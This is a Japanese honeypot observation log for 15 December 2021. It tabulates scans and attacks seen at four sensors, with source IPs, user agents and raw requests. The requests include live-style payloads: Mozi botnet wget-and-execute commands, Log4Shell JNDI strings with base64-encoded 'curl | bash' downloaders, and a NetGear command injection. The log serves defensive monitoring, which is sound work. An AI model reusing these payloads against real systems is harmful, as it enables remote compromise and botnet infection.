ハニーポット(仮) 観測記録 2021/12/15分です。
特徴
共通
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
/.envへのスキャン行為
Location:JP
ThinkPHPの脆弱性を狙うアクセス
Security Services Providerによるスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://61.137.146.74:45768/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZmEuによるスキャン行為
zgrabによるスキャン行為
/.gitへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
112[.]124[.]42[.]80に関する不正通信
を確認しました。
Location:UK
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
polaris botnetによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス
5[.]188[.]210[.]227に関する不正通信
を確認しました。
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:131 (前日比:-76)
US:総アクセス数:83 (前日比:5)
UK:総アクセス数:46 (前日比:-111)
SG:総アクセス数:67 (前日比:14)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 33 | 13.82.227.146 | United States |
| 1 | 34.86.35.13 | United States |
| 1 | 40.77.2.130 | United States |
| 2 | 44.224.32.42 | United States |
| 1 | 45.61.185.69 | United States |
| 1 | 45.61.187.76 | United States |
| 1 | 45.61.188.112 | United States |
| 6 | 50.116.16.97 | United States |
| 16 | 51.89.204.178 | France |
| 1 | 61.137.146.74 | China |
| 2 | 62.141.37.230 | Germany |
| 1 | 65.141.6.170 | United States |
| 3 | 68.183.78.209 | United States |
| 2 | 80.82.78.39 | United Kingdom |
| 1 | 104.248.163.61 | United States |
| 1 | 109.237.103.123 | Russia |
| 1 | 120.85.115.145 | China |
| 8 | 132.145.39.16 | United States |
| 3 | 134.122.134.180 | Singapore |
| 11 | 135.125.244.48 | France |
| 1 | 139.162.145.250 | Netherlands |
| 1 | 139.180.147.229 | United States |
| 5 | 143.110.220.122 | United States |
| 1 | 143.198.55.184 | United States |
| 1 | 143.198.131.1 | United States |
| 1 | 144.126.209.23 | United States |
| 2 | 147.182.195.163 | United States |
| 1 | 147.182.232.128 | United States |
| 2 | 157.245.70.127 | United States |
| 1 | 159.203.13.251 | United States |
| 1 | 159.203.18.202 | United States |
| 1 | 165.22.122.148 | United States |
| 4 | 165.232.86.149 | United States |
| 1 | 167.71.139.216 | United States |
| 1 | 179.43.167.186 | Panama |
| 1 | 185.124.29.166 | Spain |
| 4 | 195.54.160.149 | Russia |
| 1 | 199.19.224.76 | United States |
| 1 | 199.195.251.138 | United States |
| 1 | 205.185.117.154 | United States |
| 1 | 206.189.18.184 | United States |
| 1 | 209.17.97.74 | United States |
| 1 | 209.141.33.65 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 20 | - |
| 1 | Chrome/54.0 (Windows NT 10.0) |
| 18 | Go-http-client/1.1 |
| 2 | Hello, world |
| 1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 33 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
| 32 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 |
| 6 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
| 1 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
| 2 | Security Services Provider |
| 5 | \"Mozilla/5.0 |
| 2 | python-requests/2.22.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad | ||
| 1 | HELP | ||
| 6 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01\xfa\x01 | ||
| 1 | \x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n | ||
| 1 | \xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n | ||
| 44 | GET | /.env | HTTP/1.1 |
| 8 | GET | /.git | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /HNAP1 | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
| 1 | GET | /ab2h | HTTP/1.1 |
| 1 | GET | /admin/.env | HTTP/1.1 |
| 1 | GET | /api/.env | HTTP/1.1 |
| 1 | GET | /api/openapi/common/getDownloadUrl?lang=yn_YN | HTTP/1.1 |
| 1 | GET | /api/page/userInfo | HTTP/1.0 |
| 2 | GET | /app/.env | HTTP/1.1 |
| 1 | GET | /app/config/.env | HTTP/1.1 |
| 1 | GET | /apps/.env | HTTP/1.1 |
| 1 | GET | /audio/.env | HTTP/1.1 |
| 1 | GET | /backend/.env | HTTP/1.1 |
| 1 | GET | /base/.env | HTTP/1.1 |
| 1 | GET | /blog/.env | HTTP/1.1 |
| 1 | GET | /cgi-bin/.env | HTTP/1.1 |
| 1 | GET | /conf/.env | HTTP/1.1 |
| 1 | GET | /config/.env | HTTP/1.1 |
| 1 | GET | /core/.env | HTTP/1.1 |
| 1 | GET | /core/js/graph.js | HTTP/1.1 |
| 1 | GET | /crm/.env | HTTP/1.1 |
| 1 | GET | /database/.env | HTTP/1.1 |
| 1 | GET | /ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/.env | HTTP/1.1 |
| 1 | GET | /evox/about | HTTP/1.1 |
| 2 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /java_script/template_1/common.js | HTTP/1.1 |
| 1 | GET | /laravel/.env | HTTP/1.1 |
| 1 | GET | /library/.env | HTTP/1.1 |
| 1 | GET | /local/.env | HTTP/1.1 |
| 1 | GET | /login | HTTP/1.1 |
| 1 | GET | /login/.env | HTTP/1.1 |
| 1 | GET | /m/images/template_1/style_1/logo1.png | HTTP/1.1 |
| 1 | GET | /magica/api/page/userInfo | HTTP/1.0 |
| 1 | GET | /new/.env | HTTP/1.1 |
| 1 | GET | /newsite/.env | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1639487973 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1639487974 | HTTP/1.1 |
| 1 | GET | /odd/app/download/list | HTTP/1.1 |
| 1 | GET | /old/.env | HTTP/1.1 |
| 2 | GET | /owa/auth/logon.aspx | HTTP/1.1 |
| 1 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /protected/.env | HTTP/1.1 |
| 2 | GET | /public/.env | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//61[.]137[.]146[.]74:45768/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /sites/all/libraries/mailchimp/.env | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /src/.env | HTTP/1.1 |
| 2 | GET | /storage/.env | HTTP/1.1 |
| 1 | GET | /uploads/advertising/26.jpg?aaa=259158491 | HTTP/1.1 |
| 2 | GET | /vendor/.env | HTTP/1.1 |
| 1 | GET | /vendor/laravel/.env | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-admin/.env | HTTP/1.1 |
| 1 | GET | /wp-content/.env | HTTP/1.1 |
| 1 | GET | /www/.env | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.1 |
| 1 | POST | /sdk | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.82.86.206 | United States |
| 1 | 23.183.83.68 | United States |
| 4 | 23.224.186.73 | United States |
| 8 | 23.250.19.242 | Canada |
| 7 | 37.0.11.64 | Netherlands |
| 1 | 45.61.188.24 | United States |
| 1 | 45.61.188.111 | United States |
| 1 | 45.137.21.9 | Bangladesh |
| 2 | 52.148.137.198 | United States |
| 1 | 60.191.125.35 | China |
| 5 | 64.227.178.18 | United States |
| 2 | 80.82.78.39 | United Kingdom |
| 2 | 94.232.43.63 | Russia |
| 1 | 115.48.146.172 | China |
| 2 | 118.69.248.82 | Vietnam |
| 2 | 134.209.250.3 | United States |
| 3 | 137.184.214.146 | United States |
| 1 | 138.68.161.238 | United States |
| 1 | 139.59.109.165 | Singapore |
| 1 | 143.244.189.0 | United States |
| 1 | 147.182.224.211 | United States |
| 2 | 157.245.70.127 | United States |
| 1 | 159.65.63.130 | United States |
| 6 | 161.35.200.255 | United States |
| 1 | 164.90.155.51 | United States |
| 1 | 165.22.205.171 | United States |
| 1 | 165.227.239.108 | United States |
| 1 | 165.232.137.148 | United States |
| 1 | 165.232.142.210 | United States |
| 1 | 167.71.135.56 | United States |
| 1 | 167.71.139.216 | United States |
| 1 | 179.43.167.186 | Panama |
| 1 | 185.14.97.147 | Norway |
| 1 | 192.241.213.67 | United States |
| 11 | 195.54.160.149 | Russia |
| 3 | 198.50.252.31 | Canada |
| 1 | 198.98.48.83 | United States |
| 1 | 209.17.97.74 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} |
| 20 | - |
| 3 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.119 |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 |
| 18 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 4 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 6 | ZmEu |
| 1 | mozila |
| 3 | python-requests/2.26.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad | ||
| 1 | HELP | ||
| 2 | \x03 | ||
| 4 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01\xfb\x01 | ||
| 1 | \x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n | ||
| 1 | \xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n | ||
| 1 | GET | /$%7Bjndi:ldap://79[.]172[.]214[.]11:1389/Basic/Command/Base64/Y3VybCAxMzUuMTI1LjIxNy44Ny9qbmRpLnNoIHwgYmFzaA==%7D | HTTP/1.0 |
| 19 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | /.well-known/ | HTTP/1.1 |
| 2 | GET | /.well-known/security.txt | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=%24%7Bjndi%3Aldap%3A//193[.]3[.]19[.]159%3A53/c%7D | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} | HTTP/1.1 |
| 1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /aaa9 | HTTP/1.1 |
| 1 | GET | /aab9 | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
| 1 | GET | /ab2h | HTTP/1.1 |
| 1 | GET | /admin/controller/extension/extension/ | HTTP/1.1 |
| 1 | GET | /api/openapi/common/getDownloadUrl?lang=yn_YN | HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp | HTTP/1.0 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /core/js/graph.js | HTTP/1.1 |
| 1 | GET | /dispatch.asp | HTTP/1.1 |
| 3 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /files/ | HTTP/1.1 |
| 1 | GET | /images/ | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /java_script/template_1/common.js | HTTP/1.1 |
| 1 | GET | /login | HTTP/1.1 |
| 1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /odd/app/download/list | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 3 | GET | /robots.txt | HTTP/1.1 |
| 3 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /sites/default/files/ | HTTP/1.1 |
| 1 | GET | /uploads/ | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 1 | GET | /wp-admin/css/ | HTTP/1.1 |
| 1 | GET | /wp-content/ | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.1 |
| 1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.188.210.227 | Russia |
| 1 | 20.122.29.145 | United States |
| 1 | 23.183.82.20 | United States |
| 1 | 23.183.83.113 | United States |
| 1 | 23.183.83.195 | United States |
| 1 | 27.215.53.104 | China |
| 1 | 34.77.162.1 | United States |
| 1 | 38.91.44.221 | United States |
| 1 | 45.137.21.9 | Bangladesh |
| 1 | 46.101.50.19 | United States |
| 1 | 50.198.14.142 | United States |
| 1 | 70.37.106.128 | United States |
| 4 | 80.82.77.139 | United Kingdom |
| 2 | 80.82.78.39 | United Kingdom |
| 1 | 109.237.103.123 | Russia |
| 1 | 115.63.49.30 | China |
| 1 | 120.85.113.194 | China |
| 3 | 125.212.184.109 | Vietnam |
| 2 | 157.245.70.127 | United States |
| 1 | 161.35.213.143 | United States |
| 1 | 185.220.101.60 | Germany |
| 1 | 185.220.101.170 | Germany |
| 10 | 195.54.160.149 | Russia |
| 1 | 198.98.49.124 | United States |
| 1 | 205.185.116.89 | United States |
| 1 | 205.185.123.233 | United States |
| 1 | 209.17.96.226 | United States |
| 3 | 209.141.50.223 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=} |
| 15 | - |
| 1 | Chrome/54.0 (Windows NT 10.0) |
| 1 | Hello, World |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 4 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
| 1 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01\xfc\x01 | ||
| 3 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=%24%7Bjndi%3Aldap%3A//193[.]3[.]19[.]159%3A53/c%7D | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=} | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
| 1 | GET | /ab2h | HTTP/1.1 |
| 1 | GET | /api/openapi/common/getDownloadUrl?lang=yn_YN | HTTP/1.1 |
| 4 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /core/js/graph.js | HTTP/1.1 |
| 1 | GET | /dispatch.asp | HTTP/1.1 |
| 4 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /java_script/template_1/common.js | HTTP/1.1 |
| 1 | GET | /login | HTTP/1.1 |
| 1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /odd/app/download/list | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]215[.]53[.]104:51218/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.55.53.144 | United States |
| 1 | 20.113.95.210 | United States |
| 1 | 23.183.83.68 | United States |
| 1 | 23.183.83.241 | United States |
| 4 | 23.225.163.215 | United States |
| 1 | 34.96.130.15 | United States |
| 1 | 45.61.146.242 | United States |
| 1 | 45.61.188.24 | United States |
| 2 | 45.137.21.9 | Bangladesh |
| 2 | 94.232.43.63 | Russia |
| 6 | 118.69.248.82 | Vietnam |
| 1 | 135.125.217.54 | France |
| 4 | 137.184.214.146 | United States |
| 2 | 143.244.189.0 | United States |
| 1 | 147.182.224.211 | United States |
| 2 | 157.55.140.244 | United States |
| 2 | 157.230.216.203 | United States |
| 4 | 164.52.24.179 | China |
| 1 | 164.90.155.51 | United States |
| 1 | 167.71.135.56 | United States |
| 1 | 167.71.135.82 | United States |
| 1 | 167.71.139.216 | United States |
| 1 | 167.71.175.10 | United States |
| 1 | 185.243.68.9 | Germany |
| 1 | 192.241.209.27 | United States |
| 15 | 195.54.160.149 | Russia |
| 1 | 198.98.48.83 | United States |
| 1 | 198.98.49.124 | United States |
| 1 | 205.185.124.100 | United States |
| 1 | 206.189.24.140 | United States |
| 1 | 209.17.96.58 | United States |
| 3 | 209.141.50.223 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | ${jndi:ldap://45[.]83[.]193[.]150:1389/Exploit} |
| 13 | - |
| 3 | Go-http-client/1.1 |
| 15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
| 16 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 4 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 4 | python-requests/2.26.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 | ||
| 6 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01 | \x01 | |
| 2 | \x16\x03\x01\x02 | ||
| 17 | GET | /.env | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /HNAP1/ | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 2 | GET | /aaa9 | HTTP/1.1 |
| 2 | GET | /aab9 | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
